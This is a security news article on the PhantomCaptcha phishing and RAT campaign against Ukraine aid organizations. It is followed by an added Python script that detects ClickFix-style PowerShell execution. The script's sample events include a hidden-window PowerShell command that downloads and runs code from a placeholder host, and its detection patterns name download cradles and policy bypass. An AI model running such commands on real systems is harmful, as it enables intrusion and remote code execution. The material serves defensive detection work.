
PhantomCaptcha Cyberattack Hits Ukraine Aid Groups

Summary

– A coordinated phishing campaign called “PhantomCaptcha” targeted humanitarian and government organizations supporting Ukraine’s war relief efforts by impersonating the Ukrainian President’s Office.
– The attack began on October 8, 2025, using phishing emails with a malicious PDF that directed victims to a fake Zoom site to execute malware through a “ClickFix” technique.
– The malware operated in three stages: an obfuscated downloader, a reconnaissance module, and a WebSocket-based RAT for command execution and data exfiltration.
– Researchers linked the campaign to a broader operation involving malicious Android apps disguised as adult entertainment or cloud storage services, distributing apps like princess.apk to collect device data.
– To defend against such threats, organizations should monitor PowerShell activity, enforce execution policies, and track suspicious WebSocket connections, while users should avoid pasting commands into Windows Run dialogs.

A sophisticated and highly targeted phishing campaign, now identified as PhantomCaptcha, has been actively targeting humanitarian and government bodies involved in providing aid to Ukraine. Security analysts from SentinelLABS and the Digital Security Lab of Ukraine have detailed how this operation impersonated the Ukrainian President’s Office to distribute malware through a deceptive PDF attachment.

The attack commenced on October 8, 2025, when staff from prominent organizations, including the International Red Cross, UNICEF, the Norwegian Refugee Council, and multiple Ukrainian regional administrations, received fraudulent emails. These messages contained an eight-page PDF file disguised as an official government memorandum. Upon opening the document, recipients were redirected to a counterfeit Zoom website hosted on infrastructure linked to a Russian service provider.

A fake Cloudflare verification page then appeared, instructing users to carry out a series of actions. These steps ultimately triggered a PowerShell command, enabling the attackers to install harmful software directly onto the system. This method, often called “ClickFix” or “Paste and Run,” relies on individuals unknowingly executing malicious code, effectively bypassing conventional security protocols.

The malware deployed in the PhantomCaptcha campaign functioned in three distinct phases. The first stage involved a heavily obfuscated downloader script, over 500KB in size, which fetched additional malicious payloads. Next, a reconnaissance module collected critical system details such as identifiers, usernames, and domain information. Finally, a WebSocket-based remote access Trojan (RAT) was installed, giving attackers the ability to run commands and exfiltrate sensitive data.

Researchers observed that the attack infrastructure remained active for only a single day, a clear effort to avoid detection. However, backend servers continued operating to maintain control over already compromised devices. Investigators also connected PhantomCaptcha to a broader malicious operation involving Android applications disguised as adult content or cloud storage services. One domain, princess-mens[.]click, distributed an app named princess.apk, which harvested contact lists, media files, SIM card data, and location information from infected mobile devices. Although related, this mobile component is being monitored as a separate cluster of activity.

SentinelLABS described the campaign as the work of a highly capable threat actor, emphasizing the extensive planning, segmented infrastructure, and careful management of operational exposure. They noted that the six-month gap between initial infrastructure setup and the actual attack, combined with the rapid removal of user-facing domains while preserving backend control, points to an operator skilled in both offensive tactics and defensive evasion.

To guard against such threats, experts recommend exercising caution with any instructions that ask users to paste commands into Windows Run dialogs. Organizations are advised to monitor PowerShell usage closely, enforce strict execution policies, and watch for unusual WebSocket connections, especially those tied to newly created or impersonated domains.
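The monitoring advice above (watch PowerShell usage, enforce execution policies, flag unusual WebSocket use, and treat paste-into-Run-dialog behaviour as a red flag) can be prototyped as a small triage rule. The block below is an added example written for this page; it is not code from the article, from SentinelLABS, or from the Digital Security Lab of Ukraine, and it does not reproduce any real PhantomCaptcha command. It scans event records shaped like common Windows telemetry (Security 4688 / Sysmon 1 process creation, PowerShell 4104 script block logging, Sysmon 13 registry writes to the Run-dialog history key RunMRU); the field names are assumptions about that shape and the sample events are constructed, not captured data.

```python
"""Heuristic detection of ClickFix / paste-and-run PowerShell execution.

Added example, not code from the article or from SentinelLABS / DSL Ukraine.
It scans event dicts whose keys mirror common Windows telemetry fields
(assumed shape); the sample events at the bottom are constructed for this
example and are not real PhantomCaptcha artifacts.
"""
import re

# Command-line / script-block traits typical of paste-and-run chains:
# hidden window, encoded payload, policy bypass, in-memory download
# cradle, and WebSocket client use (the article's RAT stage).
SUSPICIOUS_PATTERNS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|invoke-expression|downloadstring|invoke-webrequest|iwr)\b", re.I),
    "websocket_client": re.compile(
        r"System\.Net\.WebSockets|ClientWebSocket|\bwss?://", re.I),
}
POWERSHELL_HOSTS = ("powershell.exe", "pwsh.exe")


def match_indicators(text):
    """Return the names of all patterns found in a command line or script block."""
    return [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(text or "")]


def severity(indicators):
    """Simple banding: one trait is noise-prone, three or more is worth paging on."""
    return "high" if len(indicators) >= 3 else "medium" if len(indicators) == 2 else "low"


def analyze_event(event):
    """Return a finding for one event, or None when nothing suspicious was seen."""
    eid = event.get("EventID")
    hits = []
    if eid in (4688, 1):  # process creation: who launched PowerShell, and how
        image = (event.get("Image") or "").lower()
        if image.endswith(POWERSHELL_HOSTS):
            hits = match_indicators(event.get("CommandLine"))
            # explorer.exe as parent is what the Win+R Run dialog produces; it is
            # only counted alongside another trait so ordinary launches stay quiet
            parent = (event.get("ParentImage") or "").lower()
            if hits and parent.endswith("explorer.exe"):
                hits.append("launched_from_explorer")
    elif eid == 4104:  # script block logging sees code after de-obfuscation
        hits = match_indicators(event.get("ScriptBlockText"))
    elif eid == 13:  # registry value set; RunMRU stores what was typed into Run
        target = (event.get("TargetObject") or "").lower()
        details = event.get("Details") or ""
        if "\\explorer\\runmru\\" in target and ("powershell" in details.lower()
                                                or "pwsh" in details.lower()):
            hits = ["run_dialog_powershell"] + match_indicators(details)
    if not hits:
        return None
    return {"EventID": eid, "indicators": hits, "severity": severity(hits)}


def scan(events):
    """Run analyze_event over a batch of records and return only the findings."""
    return [f for f in (analyze_event(e) for e in events) if f]


# Constructed sample telemetry (assumed field names; not real PhantomCaptcha data).
SAMPLE_EVENTS = [
    {"EventID": 4688,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr https://verify.example.invalid/x)"'},
    {"EventID": 4688,  # routine scheduled script: should not fire
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\nightly-backup.ps1"},
    {"EventID": 4104,
     "ScriptBlockText": "$ws = New-Object System.Net.WebSockets.ClientWebSocket; $ws.ConnectAsync($uri, $ct)"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": r'powershell -w hidden -c "iex (iwr https://verify.example.invalid/x)"\1'},
    {"EventID": 13,  # harmless Run-dialog history entry
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\b",
     "Details": r"notepad\1"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The explorer.exe parent check is the cheapest signal for the Run-dialog pattern but fires on legitimate Start-menu launches too, which is why it only contributes when another trait is present; the RunMRU rule catches the same behaviour even when process creation logging is off, and the 4104 rule is what exposes the WebSocket stage after a downloader has unwrapped it in memory.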

(Source: Info Security)
